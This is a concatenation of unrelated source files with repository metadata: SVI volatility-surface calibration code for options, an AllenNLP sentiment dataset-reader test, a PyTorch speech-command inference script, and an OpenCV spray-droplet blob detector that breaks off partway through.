_assert(numel(param_old) == 5, ('There have to be five original parameters'))
if not ((_from == 'raw') or (_from == 'natural') or (_from == 'jumpwing')):
error('from has to be one of: raw, natural, jumpwing')
if not ((to == 'raw') or (to == 'natural') or (to == 'jumpwing')):
error('from has to be one of: raw, natural, jumpwing')
if ((to == 'jumpwing') or (_from == 'jumpwing')) and (tau is None):
error('tau is required for tailwings formulation')
__switch_0__ = _from
if __switch_0__ == 'raw':
a = param_old[0]
b = param_old[1]
m = param_old[3]
rho = param_old[2]
sigma = param_old[4]
__switch_1__ = to
if __switch_1__ == 'raw':
param_new = param_old
elif __switch_1__ == 'natural':
omega = 2 * b * sigma / sqrt(1 - rho ** 2)
delta = a - omega / 2 * (1 - rho ** 2)
mu = m + rho * sigma / sqrt(1 - rho ** 2)
zeta = sqrt(1 - rho ** 2) / sigma
param_new = [delta, mu, rho, omega, zeta]
elif __switch_1__ == 'jumpwing':
w = a + b * (-rho * m + sqrt(m ** 2 + sigma ** 2))
v = w / tau
psi = 1 / np.sqrt(w) * b / 2 * (-m / sqrt(m ** 2 + sigma ** 2) + rho)
p = 1 / np.sqrt(w) * b * (1 - rho)
c = 1 / np.sqrt(w) * b * (1 + rho)
vt = 1 / tau * (a + b * sigma * sqrt(1 - rho ** 2))
param_new = [v, psi, p, c, vt]
elif __switch_0__ == 'natural':
__switch_1__ = to
if __switch_1__ == 'raw':
delta = param_old[0]
mu = param_old[1]
rho = param_old[2]
omega = param_old[3]
zeta = param_old[4]
a = delta + omega / 2 * (1 - rho ** 2)
b = omega * zeta / 2
m = mu - rho / zeta
sigma = np.sqrt(1 - rho ** 2) / zeta
param_new = [a, b, rho, m, sigma]
elif __switch_1__ == 'natural':
param_new = param_old
elif __switch_1__ == 'jumpwing':
param_temp = svi_convertparameters(param_old, 'natural', 'raw', tau)
param_new = svi_convertparameters(param_temp, 'raw', 'jumpwing', tau)
elif __switch_0__ == 'jumpwing':
__switch_1__ = to
if __switch_1__ == 'raw':
v = param_old[0]
psi = param_old[1]
p = param_old[2]
c = param_old[3]
vt = param_old[4]
w = v * tau
b = np.sqrt(w) / 2 * (c + p)
rho = 1 - p * np.sqrt(w) / b
beta = rho - 2 * psi * np.sqrt(w) / b
alpha = np.sign(beta) * np.sqrt(1 / beta ** 2 - 1)
m = ((v - vt) * tau /
(b * (-rho + np.sign(alpha) * np.sqrt(1 + alpha ** 2) - alpha * np.sqrt(1 - rho ** 2))))
if m == 0:
sigma = (vt * tau - w) / b / (sqrt(1 - rho ** 2) - 1)
else:
sigma = alpha * m
a = vt * tau - b * sigma * np.sqrt(1 - rho ** 2)
if sigma < 0:
sigma = 0
param_new = [a, b, rho, m, sigma]
elif __switch_1__ == 'natural':
param_temp = svi_convertparameters(param_old, 'jumpwing', 'raw', tau)
param_new = svi_convertparameters(param_temp, 'raw', 'natural', tau)
elif __switch_1__ == 'jumpwing':
param_new = param_old
return param_new
#######################################################################################
def fit_svi_surface(implied_volatility=None,
maturity=None,
log_moneyness=None,
phifun=None,
S0=None,
lambdaList=None):
#fit_svi_surface calibrates the SVI surface to market data. First, the entire Surface SVI is fitted
#to all log-moneyness-theta observations. Second, each slice is fitted again using the SSVI fit as
#initial guess.
#
# Input:
# * impliedvolatility, maturity, moneyness, phi
# Output:
# * parameters = (5xT) = parameters of SSVI = [a, b, rho, m, sigma]
# * maturities = (Tx1) = corresponding time to maturity
# * S0 = () = underlying value
# step one: estimate total implied variance
total_implied_variance = np.multiply(np.square(implied_volatility), maturity)
# step two: use linear interpolation for ATM total implied variance
maturities = np.sort(np.unique(maturity))
T = size(maturities)
theta = np.zeros(T)#np.zeros((T, 1))
for t in np.arange(T):
pos = (maturity == maturities[t]) #position corresponding to a slice i.e. a smile
tiv_t = total_implied_variance[pos]
if np.isin(0, log_moneyness[pos]):
theta[t] = tiv_t[log_moneyness[pos] == 0] #ATM total implied variance
else:#Interpolate ATM total implied variance from the smile
theta[t] = max(interp1(log_moneyness[pos], tiv_t, 0, 'linear', 'extrapolate'), theta[t-1] if t > 0 else 0)
# step three: fit SVI surface by estimating parameters = [rho, lambda] subject to parameter bounds:
# -1 < rho < 1, 0 < lambda
# and constraints: in heston_like: (1 + |rho|) <= 4 lambda, in power-law: eta(1+|rho|) <= 2
v = np.divide(theta, maturities)
#print()
# step five: iterate through each maturity and fit c and vt for best fit
parameters = np.zeros((5, T))
for t in np.arange(T):#[::-1]:
pos = (maturity == maturities[t]) #position for the slice
log_moneyness_t = log_moneyness[pos]
total_implied_variance_t = total_implied_variance[pos] #smile
print("time step", t, " : ", maturities[t])
if t == 0:
parameters[:, t] = fit_svi(mkt_tot_variance=total_implied_variance_t,
maturity=maturities[t],
log_moneyness=log_moneyness_t,
initialGuess=None,
S0=S0,
lambdaList = lambdaList,
param_slice_before = None)
else:
parameters[:, t] = fit_svi(mkt_tot_variance=total_implied_variance_t,
maturity=maturities[t],
log_moneyness=log_moneyness_t,
initialGuess=parameters[:, t-1],
S0=S0,
lambdaList = lambdaList,
param_slice_before = None)#parameters[:, t-1])
theta[t] = SVI_two_arguments(parameters[:, t], 0.0)
return parameters, theta, maturities
##################################################################################### Interpolating different SVI smiles
def svi_interpolation(log_moneyness=None,
tau_interp=None,
forward_interp=None,
interest_interp=None,
parameters=None,
theta=None,
maturities=None,
forward_theta=None,
interest_rate_theta=None,
S0=None,
bootstrap=None ,
optionType = None):
#svi_interpolation estimates inter/extrapolated SVI
#
#Input:
# * log_moneyness = (Kx1) = log-moneyness at which to evalute volatility slices
# * tau_interp = scalar = maturity at which to generate volatility slices
# * forward_interp = scalar = forward prices corresponding to maturities
# * interest_interp = scalar = interest rates corresponding to maturities
# * parameters (5xL) = estimated parameters of SVI in jumpwing parameterization
# * theta (Lx1) = ATM total variance time at which the parameters were estimated
# * maturities (Lx1) = time to maturity corresponding to theta
# * forward_theta = (Lx1) = forward prices corresponding to theta
# * interest_rate_theta = (Lx1) = interest rates corresponding to theta (can be scalar)
# * S0 = () = underlying value
# * bootstrap = class = provided srvices for discoounting and dividend
#
#Output:
# * total_implied_variance (Kx1) = total_implied_variances for each log_moneyness and tau_interp
# * implied_volatility (Kx1) = implied volatilities corresponding to total_implied_variance
# * call_price (Kx1) = call option prices correspongin to total_implied_variance
#ensure column vectors
log_moneyness = log_moneyness.flatten()
theta = theta.flatten()
maturities = maturities.flatten()
forward_theta = forward_theta.flatten()
interest_rate_theta = interest_rate_theta.flatten()
#ensure scalar input
_assert(type(tau_interp)==np.float, ('tau_interp has to be scalar'))
_assert(type(forward_interp)==np.float, ('forward_interp has to be scalar'))
_assert(type(interest_interp)==np.float, ('interest_interp has to be scalar'))
#expand scalar input
if numel(interest_rate_theta) == 1:
interest_rate_theta = interest_rate_theta * ones(size(theta))
# ensure correct size of input
_assert(size(parameters, 1) == size(theta, 0), ('parameter set for each theta required'))
_assert(isequal(size(theta), size(forward_theta), size(interest_rate_theta)),
('theta, forward_theta, and interestrate_theta have to have the same size'))
# estimate theta for interpolated maturity
theta_interp = interp1(maturities, theta, tau_interp, 'linear', 'extrapolate')
close = S0#np.multiply(forward_interp, exp(-interest_interp * tau_interp))
paramJumpwing = np.zeros_like(parameters)
for i in range(parameters.shape[1]) :
paramJumpwing[:,i] = svi_convertparameters(parameters[:,i], 'raw', 'jumpwing', maturities[i])
if ismember(tau_interp, maturities):
indexMaturity = np.argwhere(maturities == tau_interp)[0][0]
total_implied_variance = SVI_two_arguments(parameters[:, indexMaturity], log_moneyness)
implied_volatility = sqrt(total_implied_variance / tau_interp)
strike = forward_interp * exp(log_moneyness)
optionPrice = np.array(blsprice(close, strike,
bootstrap,
tau_interp,
implied_volatility,
optionType))
else:
if min(maturities) < tau_interp and tau_interp < max(maturities):
# interpolation
idx = idxmin(abs(tau_interp - maturities))[0]
# if closest maturity is smaller than tau_interp, make idx one unit larger --> idx is index of
# smallest maturity larger than tau_interp
if maturities[idx] < tau_interp:
idx = idx + 1
epsilon = 1e-6
thetaBefore = SVI_two_arguments(parameters[:, idx - 1], 0.0)
thetaAfter = SVI_two_arguments(parameters[:, idx], 0.0)
if abs(thetaAfter - thetaBefore) > epsilon :
alpha_t = ((sqrt(thetaAfter) - sqrt(theta_interp)) / (sqrt(thetaAfter) - sqrt(thetaBefore)))
else :
alpha_t = ((maturities[idx] - tau_interp) / (maturities[idx]- maturities[idx-1]))
param_interp = alpha_t * paramJumpwing[:, idx - 1] + (1 - alpha_t) * paramJumpwing[:, idx]
param_interp = svi_convertparameters(param_interp, 'jumpwing', 'raw', tau_interp)
total_implied_variance = SVI_two_arguments(param_interp, log_moneyness)
implied_volatility = sqrt(total_implied_variance / tau_interp)
strike = forward_interp * exp(log_moneyness)
optionPrice = np.array(blsprice(close, strike,
bootstrap,
tau_interp,
implied_volatility,
optionType))
elif tau_interp < min(maturities):
# extrapolation for small maturities
forward_0 = interp1(maturities, forward_theta, 0.0, 'linear', 'extrapolate')
strike_1 = forward_0 * exp(log_moneyness)
isCall = np.where(optionType==1, True, False)
optionPrice_1 = np.where(isCall,
np.maximum(close - strike_1, 0.0),
np.maximum(strike_1 - close, 0.0))
idx = 0
total_implied_variance_2 = SVI_two_arguments(parameters[:, idx], log_moneyness)
implied_volatility_2 = sqrt(total_implied_variance_2 / maturities[idx])
strike_2 = forward_theta[idx] * exp(log_moneyness)
optionPrice_2 = np.array(blsprice(close, strike_2,
bootstrap,
maturities[idx],
implied_volatility_2,
optionType))
thetaAfter = SVI_two_arguments(parameters[:, idx], 0.0)
alpha_t = (sqrt(thetaAfter) - sqrt(theta_interp)) / sqrt(thetaAfter)
K_t = forward_interp * exp(log_moneyness)
optionPrice = np.multiply(K_t,
( np.divide(alpha_t * optionPrice_1, strike_1) + np.divide((1 - alpha_t) * optionPrice_2, strike_2) ))
implied_volatility = blsimpv(close, K_t, bootstrap, tau_interp, optionPrice, optionType)
total_implied_variance = np.power(implied_volatility, 2) * tau_interp
if any((total_implied_variance - total_implied_variance_2) >= 0) : #Arbitrage are caused by
param_slope = (paramJumpwing[:, idx + 1] - paramJumpwing[:, idx]) / (theta[idx + 1] - theta[idx])
param_interp = paramJumpwing[:, idx] + (theta_interp - theta[idx]) * param_slope
param_interp = svi_convertparameters(param_interp, 'jumpwing', 'raw', tau_interp)
total_implied_variance = SVI_two_arguments(param_interp, log_moneyness)
implied_volatility = sqrt(total_implied_variance / tau_interp)
strike = forward_interp * exp(log_moneyness)
optionPrice = np.array(blsprice(close, strike,
bootstrap,
tau_interp,
implied_volatility,
optionType))
else:
# extrapolation for large maturities
total_implied_variance = SVI_two_arguments(parameters[:, -1], log_moneyness)
total_implied_variance = total_implied_variance + theta_interp - theta[-1]
implied_volatility = sqrt(total_implied_variance / tau_interp)
strike = forward_interp * exp(log_moneyness)
optionPrice = np.array(blsprice(close, strike,
bootstrap,
tau_interp,
implied_volatility,
optionType))
return optionPrice, implied_volatility, total_implied_variance
##################################################################################### Main functions
def interpolateGrid(df,
parameters,
theta,
maturities,
interestrate_theta,
forward_theta,
S0,
bootstrap):
impliedVolInterpolated = pd.Series()
#print(df.head())
for smile in df.rename({"Maturity" : "MaturityColumn"}, axis=1).groupby("MaturityColumn"):
maturity = smile[0]
tau_interp = maturity
k = smile[1]["logMoneyness"].values
#print(maturities)
#print(forward_theta)
#print(tau_interp)
forward_interp = interp1(maturities,
forward_theta,
tau_interp,
'linear',
"extrapolate")
interest_interp = bootstrap.discountShortRate(tau_interp)
optionType = smile[1]["OptionType"].values
call_price, implied_volatility, total_implied_variance = svi_interpolation(k,
tau_interp,
float(forward_interp),
float(interest_interp),
parameters,
theta,
maturities,
forward_theta,
interestrate_theta,
S0,
bootstrap,
optionType)
impliedVolInterpolated = impliedVolInterpolated.append(pd.Series(implied_volatility, index=smile[1].index))
index = pd.MultiIndex.from_tuples(impliedVolInterpolated.index.tolist(),
names=["Strike", "Maturity"])
return pd.Series(impliedVolInterpolated.values, index=index).sort_index()
def impliedVariance(impVol, mat=None):
Ts = impVol.index.get_level_values("Maturity") if mat is None else mat
return np.square(impVol) * Ts
##################################################################################### Local volatility
def finiteDifferenceSVI(xSet, sviEvalModel):
strikeStep = 0.0001
maturityStep = 0.0001
moneynesses = np.exp(xSet.logMoneyness)
x = moneynesses = xSet.logMoneyness
maturities = xSet.Maturity
xSetShifted = xSet.copy(deep=True)
xSetShifted["logMoneyness"] = xSetShifted["logMoneyness"] + strikeStep
gridStrikeUp = impliedVariance(sviEvalModel(xSetShifted))
xSetShifted["logMoneyness"] = xSetShifted["logMoneyness"] - 2 * strikeStep
gridStrikeLow = impliedVariance(sviEvalModel(xSetShifted))
gridStrikeMid = impliedVariance(sviEvalModel(xSet))
hk = pd.Series((gridStrikeUp + gridStrikeLow - 2 * gridStrikeMid) / (strikeStep**2),
index = xSet.index)
dK = pd.Series((gridStrikeUp - gridStrikeLow ) / (2 * strikeStep),
index = xSet.index)
xSetShifted["logMoneyness"] = xSetShifted["logMoneyness"] + strikeStep
xSetShifted["Maturity"] = xSetShifted["Maturity"] + maturityStep
gridMaturityUp = impliedVariance(sviEvalModel(xSetShifted), mat = xSetShifted["Maturity"].values)
xSetShifted["Maturity"] = xSetShifted["Maturity"] - 2 * maturityStep
gridMaturityLow = impliedVariance(sviEvalModel(xSetShifted), mat = xSetShifted["Maturity"].values)
dT = pd.Series((gridMaturityUp - gridMaturityLow) / (2 * maturityStep),
index = xSet.index)
numerator = (1 - np.divide(x, gridStrikeMid) * dK +
0.25 * ( -0.25 - np.divide(1, gridStrikeMid) +
np.square(np.divide(x, gridStrikeMid.values)) ) * np.square(dK) +
0.5 * hk )
locVolGatheral = np.sqrt(dT / numerator)
return dT, hk, dK, locVolGatheral, numerator
def removeMaturityInvalidData(df):
initialist = df["Maturity"].unique()
maturitiesToKeep = np.ravel( list( filter(lambda x : (df[df["Maturity"]==x]["logMoneyness"].unique().shape[0] > 1), initialist) ) )
return df[df["Maturity"].isin(maturitiesToKeep)]
########################################################################################## Main Class
class SSVIModelUnconstrained:
def __init__(self, S0, bootstrap):
#Hyperparameters
self.phi = "power_law"
self.bootstrap = bootstrap
self.S0 = S0
self.tau_interp = 30 / 365.25
self.interpMethod = 'linear'
self.extrapolationMethod = "extrapolate"
#Fitting results
self.parameters = None
self.theta = None
self.maturities = None
self.interestrate_theta = None
self.forward_theta = None
self.lambdaList = [1.0, 1.0, 1.0, 1.0, 1.0]
def fit(self, df):
start = time.time()
filteredDf = removeMaturityInvalidData(df)
self.parameters, self.theta, self.maturities = fit_svi_surface(filteredDf[impliedVolColumn].values,
filteredDf["Maturity"].values,
filteredDf["logMoneyness"].values,
self.phi,
S0 = self.S0,
lambdaList = self.lambdaList)
#dataSet = dataSet.copy()
forward = np.exp(-filteredDf["logMoneyness"]) * filteredDf["Strike"]
# round for float comparaison
self.forward_theta = forward.groupby("Maturity").mean().values
self.interestrate_theta = self.bootstrap.discountIntegral(self.maturities) / self.maturities
end = time.time()
print("Training Time : ", end - start)
return
def assessArbitrageViolations(self, df):
nbViolationBut = 0
#logMoneynessGrid = df["logMoneyness"].unique()
logMoneynessGrid = np.linspace(np.log(0.3),
np.log(3.0),
num=200)
for m in range(self.parameters.shape[1]):
a, b, rho, m, sig = self.parameters[:,m]
g = test_convexity(logMoneynessGrid, a, b, rho, m, sig)
nbViolationBut += np.sum(g < 0.0)
slicePrevious = np.zeros_like(logMoneynessGrid)
nbViolationCal = 0
for m in range(self.parameters.shape[1]):
a, b, rho, m, sig = self.parameters[:,m]
sliceSVI = SVI(logMoneynessGrid, a, b, rho, m, sig)
nbViolationCal += np.sum((slicePrevious - sliceSVI) > 0.0)
slicePrevious = sliceSVI
return nbViolationBut, nbViolationCal
def automaticHyperparametersTuning(self, df):
#Block print
formerStdOut = sys.stdout
sys.stdout = open(os.devnull, 'w')
def multiplyList(liste, factor):
return list(map(lambda y : factor * y, liste))
#Iterate on a grid of values for butterfly arbitrage constraint
formerLambdaList = self.lambdaList
lambdaButterfly = [0.0, 1e-3, 1e-2, 1e-1, 1.0, 10.0, 1e2, 1e3, 1e4, 1e5]
numberOfarbitrageButterfly = []
rmseBut = []
firstArbitrageFreeLambda = None
for l in lambdaButterfly :
self.lambdaList = multiplyList(formerLambdaList, l)
self.lambdaList[4] = 0.0
self.fit(df)
numberOfarbitrageButterfly.append(self.assessArbitrageViolations(df)[0])
pred = self.eval(df)
rmseBut.append( mean_squared_error( pred, df[impliedVolColumn]))
if (firstArbitrageFreeLambda is None) and (numberOfarbitrageButterfly[-1]==0) :
firstArbitrageFreeLambda = l
#Iterate on a grid of values for calendar arbitrage constraint
lambdaCalendar = [0.0, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1.0, 10.0, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1e9]
numberOfArbitrageCalendar = []
rmseCal = []
for l in lambdaCalendar :
self.lambdaList = multiplyList(formerLambdaList, l)
self.lambdaList[0] = firstArbitrageFreeLambda
self.lambdaList[1] = firstArbitrageFreeLambda
self.lambdaList[2] = firstArbitrageFreeLambda
self.lambdaList[3] = firstArbitrageFreeLambda
self.fit(df)
numberOfArbitrageCalendar.append(self.assessArbitrageViolations(df)[1])
pred = self.eval(df)
rmseCal.append( mean_squared_error( pred, df[impliedVolColumn]))
self.lambdaList = formerLambdaList
#Activate print
#sys.stdout = formerStdOut
sys.stdout = formerStdOut
res = {"ButterflyArbitrage" : pd.Series(numberOfarbitrageButterfly, index = lambdaButterfly),
"CalendarArbitrage" : pd.Series(numberOfArbitrageCalendar, index = lambdaCalendar),
"ButterflyRMSE" : pd.Series(rmseBut, index = lambdaButterfly),
"CalendarRMSE" : pd.Series(rmseCal, index = lambdaCalendar)}
plt.plot(res["ButterflyArbitrage"])
plt.title("Number of arbitrages")
plt.xscale('symlog')
plt.show()
plt.plot(res["ButterflyRMSE"])
plt.title("RMSES")
plt.xscale('symlog')
plt.show()
plt.plot(res["CalendarArbitrage"])
plt.title("Number of arbitrages")
plt.xscale('symlog')
plt.show()
plt.plot(res["CalendarRMSE"])
plt.title("RMSES")
plt.xscale('symlog')
plt.show()
#Dichotomy on parameter values for which we can assume monotonicity : the higher the penalization, the worst the accuracy and less arbitrage occured
return res
def eval(self, df):
serie = interpolateGrid(df[df["Maturity"] > 0],
self.parameters,
self.theta,
self.maturities,
self.interestrate_theta,
self.forward_theta,
self.S0,
self.bootstrap)
return serie
|
[
"marc.chataign@gmail.com"
] |
marc.chataign@gmail.com
|
6576a596822baf4eb435a1fe47e11d479398497b
|
fd878bcdaa9489883894c942aae5e316a15c2085
|
/tests/dataset_readers/sst_test.py
|
477e1a51ec7a5efbd55ddd0006bc58ee474d6ddc
|
[] |
no_license
|
Shuailong/SPM
|
a12d18baa39a72a9243ad9cd4238168ab42b96d1
|
0105dae90a4acdebfc875001efab7439b3eb8259
|
refs/heads/master
| 2020-04-26T04:51:14.279859
| 2019-06-24T03:55:11
| 2019-06-24T03:55:11
| 173,315,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,551
|
py
|
# pylint: disable=no-self-use,invalid-name
import pytest
import pathlib
import random
import os
from allennlp.common import Params
from allennlp.common.util import ensure_list
from allennlp.common.testing import ModelTestCase
from allennlp.data.dataset import Batch
from allennlp.data.fields import TextField
from allennlp.data.instance import Instance
from allennlp.data.token_indexers.wordpiece_indexer import PretrainedBertIndexer
from allennlp.data.tokenizers import WordTokenizer, Token
from allennlp.data.tokenizers.word_splitter import BertBasicWordSplitter
from allennlp.data.vocabulary import Vocabulary
from allennlp.modules.token_embedders.bert_token_embedder import PretrainedBertEmbedder
from spm.data.dataset_readers import GLUESST2DatasetReader
from spm import DATA_DIR as DATA_ROOT
class TestSSTReader:
FIXTURES_ROOT = (pathlib.Path(__file__).parent /
".." / ".." / "tests" / "fixtures").resolve()
BERT_VOCAB_PATH = os.path.join(
DATA_ROOT, 'bert/bert-base-uncased-vocab.txt')
@pytest.mark.parametrize("lazy", (True, False))
def test_read(self, lazy):
reader = GLUESST2DatasetReader(
tokenizer=WordTokenizer(word_splitter=BertBasicWordSplitter()),
token_indexers={'bert': PretrainedBertIndexer(
pretrained_model=self.BERT_VOCAB_PATH)},
skip_label_indexing=False
)
instances = reader.read(
str(self.FIXTURES_ROOT / 'dev.tsv'))
instances = ensure_list(instances)
example = instances[0]
tokens = [t.text for t in example.fields['tokens']]
label = example.fields['label'].label
print(label)
print(tokens)
batch = Batch(instances)
vocab = Vocabulary.from_instances(instances)
batch.index_instances(vocab)
padding_lengths = batch.get_padding_lengths()
tensor_dict = batch.as_tensor_dict(padding_lengths)
tokens = tensor_dict["tokens"]
print(tokens['mask'].tolist()[0])
print(tokens["bert"].tolist()[0])
print([vocab.get_token_from_index(i, "bert")
for i in tokens["bert"].tolist()[0]])
print(len(tokens['bert'][0]))
print(tokens["bert-offsets"].tolist()[0])
print(tokens['bert-type-ids'].tolist()[0])
def test_can_build_from_params(self):
reader = GLUESST2DatasetReader.from_params(Params({}))
# pylint: disable=protected-access
assert reader._token_indexers['tokens'].__class__.__name__ == 'SingleIdTokenIndexer'
|
[
"liangshuailong@gmail.com"
] |
liangshuailong@gmail.com
|
a3dc231f3dbd0e2e1ef4dbdd546e09d37e950ff2
|
f224fad50dbc182cda86291c83954607bbb60901
|
/inference.py
|
ce98cbf4d15f6bc1e05363be1db9afeb1e519de5
|
[] |
no_license
|
Hongpeng1992/pytorch-commands
|
7fd26202b7cf7d46a0ac8e1241336e8ca5dad30e
|
5853625d9852e948c1ac337547f8078d048699a0
|
refs/heads/master
| 2020-05-04T15:38:26.704013
| 2019-02-07T07:04:01
| 2019-02-07T07:04:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,644
|
py
|
import argparse
import io
import os
import csv
import time
import numpy as np
import pandas as pd
from collections import OrderedDict
from datetime import datetime
from dataset import CommandsDataset, get_labels
from models import model_factory
from utils import AverageMeter, get_outdir
import torch
import torch.autograd as autograd
import torch.nn
import torch.nn.functional as F
import torch.utils.data as data
import torchvision.utils
parser = argparse.ArgumentParser(description='Inference')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('--model', default='resnet101', type=str, metavar='MODEL',
help='Name of model to train (default: "countception"')
parser.add_argument('--gp', default='avg', type=str, metavar='POOL',
help='Type of global pool, "avg", "max", "avgmax", "avgmaxc" (default: "avg")')
parser.add_argument('--tta', type=int, default=0, metavar='N',
help='Test/inference time augmentation (oversampling) factor. 0=None (default: 0)')
parser.add_argument('--pretrained', action='store_true', default=False,
help='Start with pretrained version of specified network (if avail)')
parser.add_argument('-b', '--batch-size', type=int, default=512, metavar='N',
help='input batch size for training (default: 512)')
parser.add_argument('-j', '--workers', type=int, default=2, metavar='N',
help='how many training processes to use (default: 1)')
parser.add_argument('--num-gpu', type=int, default=1,
help='Number of GPUS to use')
parser.add_argument('--checkpoint', default='', type=str, metavar='PATH',
help='path to restore checkpoint (default: none)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--save-batches', action='store_true', default=False,
help='save images of batch inputs and targets every log interval for debugging/verification')
parser.add_argument('--output', default='', type=str, metavar='PATH',
help='path to output folder (default: none, current dir)')
def main():
args = parser.parse_args()
num_classes = len(get_labels())
test_time_pool = 0 #5 if 'dpn' in args.model else 0
model = model_factory.create_model(
args.model,
in_chs=1,
num_classes=num_classes,
global_pool=args.gp,
test_time_pool=test_time_pool)
#model.reset_classifier(num_classes=num_classes)
if args.num_gpu > 1:
model = torch.nn.DataParallel(model, device_ids=list(range(args.num_gpu))).cuda()
else:
model.cuda()
if not os.path.exists(args.checkpoint):
print("=> no checkpoint found at '{}'".format(args.checkpoint))
exit(1)
print("=> loading checkpoint '{}'".format(args.checkpoint))
checkpoint = torch.load(args.checkpoint)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})".format(args.checkpoint, checkpoint['epoch']))
else:
model.load_state_dict(checkpoint)
csplit = os.path.normpath(args.checkpoint).split(sep=os.path.sep)
if len(csplit) > 1:
exp_name = csplit[-2] + '-' + csplit[-1].split('.')[0]
else:
exp_name = ''
if args.output:
output_base = args.output
else:
output_base = './output'
output_dir = get_outdir(output_base, 'predictions', exp_name)
dataset = CommandsDataset(
root=args.data,
mode='test',
format='spectrogram'
)
loader = data.DataLoader(
dataset,
batch_size=args.batch_size,
pin_memory=True,
shuffle=False,
num_workers=args.workers
)
model.eval()
batch_time_m = AverageMeter()
data_time_m = AverageMeter()
try:
# open CSV for writing predictions
cf = open(os.path.join(output_dir, 'results.csv'), mode='w')
res_writer = csv.writer(cf)
res_writer.writerow(['fname'] + dataset.id_to_label)
# open CSV for writing submission
cf = open(os.path.join(output_dir, 'submission.csv'), mode='w')
sub_writer = csv.writer(cf)
sub_writer.writerow(['fname', 'label', 'prob'])
end = time.time()
batch_sample_idx = 0
for batch_idx, (input, target) in enumerate(loader):
data_time_m.update(time.time() - end)
input = input.cuda()
output = model(input)
# augmentation reduction
#reduce_factor = loader.dataset.get_aug_factor()
#if reduce_factor > 1:
# output = output.unfold(0, reduce_factor, reduce_factor).mean(dim=2).squeeze(dim=2)
# index = index[0:index.size(0):reduce_factor]
# move data to CPU and collect)
output_logprob = F.log_softmax(output, dim=1).cpu().numpy()
output = F.softmax(output, dim=1)
output_prob, output_idx = output.max(1)
output_prob = output_prob.cpu().numpy()
output_idx = output_idx.cpu().numpy()
for i in range(output_logprob.shape[0]):
index = batch_sample_idx + i
pred_label = dataset.id_to_label[output_idx[i]]
pred_prob = output_prob[i]
filename = dataset.filename(index)
res_writer.writerow([filename] + list(output_logprob[i]))
sub_writer.writerow([filename] + [pred_label, pred_prob])
batch_sample_idx += input.size(0)
batch_time_m.update(time.time() - end)
if batch_idx % args.print_freq == 0:
print('Inference: [{}/{} ({:.0f}%)] '
'Time: {batch_time.val:.3f}s, {rate:.3f}/s '
'({batch_time.avg:.3f}s, {rate_avg:.3f}/s) '
'Data: {data_time.val:.3f} ({data_time.avg:.3f})'.format(
batch_sample_idx, len(loader.sampler),
100. * batch_idx / len(loader),
batch_time=batch_time_m,
rate=input.size(0) / batch_time_m.val,
rate_avg=input.size(0) / batch_time_m.avg,
data_time=data_time_m))
end = time.time()
# end iterating through dataset
except KeyboardInterrupt:
pass
except Exception as e:
print(str(e))
if __name__ == '__main__':
main()
|
[
"rwightman@gmail.com"
] |
rwightman@gmail.com
|
d27b115ccb6e7ef16a5a8dc0e95cc0d084f526b3
|
1d9d6f72b10dd34fd501b8ba58b1b8bfcb2ebb72
|
/spraying/detect_blobs.py
|
0efb6f21908c7287a1b7ba03fbcdda00698467ab
|
[] |
no_license
|
crushendo/spraying
|
eb684ae0a1691e39f74978c2556a000e394920c2
|
93644410a17351ee8ae85f66fe8622887670f2c3
|
refs/heads/master
| 2021-01-19T22:46:57.663738
| 2017-08-11T19:11:00
| 2017-08-11T19:11:00
| 88,867,886
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,690
|
py
|
import cv2
import numpy as np
class blob_detector():
def main(self):
blobs = blob_detector()
img, params = blobs.initialize()
all_keypoints = blobs.all_drops(img, params)
single_keypoints, diameter_list = blobs.single_drops(img,params)
double_keypoints = blobs.double_drops(img,params)
triple_keypoints = blobs.triple_drops(img,params)
blobs.output(img, all_keypoints, single_keypoints, double_keypoints, triple_keypoints)
def initialize(self):
#img = cv2.imread("thresholded_paper_5.png")
img = cv2.imread("spray_paper_large.tiff")
params = cv2.SimpleBlobDetector_Params()
return img, params
# ----------------
# Single Droplets
# ----------------
def single_drops(self,img,params):
# Minimum Area
params.filterByArea = True
params.minArea = 10
# Circularity
params.filterByCircularity = True
params.minCircularity = 0
#Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.2
# Convexity Parameters
params.filterByConvexity = True
params.minConvexity = 0.93
params.maxConvexity = 1
#Set up detector
detector = cv2.SimpleBlobDetector(params)
# Detect blobs
single_keypoints = detector.detect(img)
single_drops = len(single_keypoints)
i=0
diameter_list = []
#for keypoint in single_keypoints:
# keypoint = single_keypoints.size
# keypoint = keypoint / ppi
# keypoint = keypoint * keypoint * 3.14159 * 0.25
# drop_d = keypoint ** 0.455 * 1.06
# diameter_list[i] = drop_d
# i += 1
print "Single drops: " + str(single_drops)
return single_keypoints, diameter_list
# ----------------
# Double Droplets
# ----------------
def double_drops(self,img,params):
# Minimum Area
params.filterByArea = True
params.minArea = 10
# Circularity
params.filterByCircularity = True
params.minCircularity = 0
#Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.2
# Convexity Parameters
params.filterByConvexity = True
params.minConvexity = 0.90
params.maxConvexity = 0.92
# Set up detector
detector = cv2.SimpleBlobDetector(params)
# Detect blobs
double_keypoints = detector.detect(img)
double_drops = len(double_keypoints)
print "Double drops: " + str(double_drops)
return double_keypoints
# ----------------
# Triple Droplets
# ----------------
def triple_drops(self,img,params):
# Minimum Area
params.filterByArea = True
params.minArea = 10
# Circularity
params.filterByCircularity = True
params.minCircularity = 0
# Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.2
# Convexity Parameters
params.filterByConvexity = True
params.minConvexity = 0.85
params.maxConvexity = 0.89
# Set up detector
detector = cv2.SimpleBlobDetector(params)
# Detect blobs
triple_keypoints = detector.detect(img)
triple_drops = len(triple_keypoints)
print "Triple drops: " + str(triple_drops)
return triple_keypoints
# -------------
# All Droplets
# -------------
def all_drops(self,img,params):
# Minimum Area
params.filterByArea = True
params.minArea = 10
# Circularity
params.filterByCircularity = True
params.minCircularity = 0
# Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.2
